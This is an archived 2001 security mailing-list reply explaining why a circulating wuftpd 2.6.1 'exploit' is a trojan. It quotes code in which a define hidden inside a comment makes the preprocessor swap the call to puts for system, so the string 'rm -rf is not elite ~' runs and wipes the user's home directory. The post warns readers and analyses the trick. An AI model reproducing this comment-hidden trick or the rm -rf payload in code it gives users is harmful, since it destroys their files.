Re[2]: wuftpd 2.6.1 advisory/exploit

From: Alexander Ryumshin (miziat_private)
Date: Thu Sep 20 2001 - 05:55:14 PDT

  • Next message: |Zan: "[DeepZone black tool] NT/2k/XP portable shellcode generator updated!"

    Yes, the trick is here:
    //#define POTS 12                       /* fill these in for your
    #define DEF_ALGN 1                       * target system  
    //#define HEAP_ADDR 0x41414141           */ 
    #define target (unsigned long)
    unsigned long arg_addr = ADDR, align = DEF_ALGN,
    After preprocessing the code looks like
    unsigned long arg_addr = 0x08049588, align = 1 * (unsigned long) system;
    Then puts' address is being replaced by system's or something like
    that and then puts("rm -rf is not elite ~"); does the main trick :)
    Hint: ~ means your home directory.
    Wednesday, September 19, 2001, 6:38:14 PM, you wrote:
    BB> Hey, I'm told that this exploit like eats your hard drive or something.
    BB> Caveat emptor and all, but I figured since I actually heard about this,
    BB> I'd let you know.  I guess it's a spoofed note.
    BB>                                         BB
    Best regards,
    ISP Alkar Teleport
    tel/fax +380 562 340044

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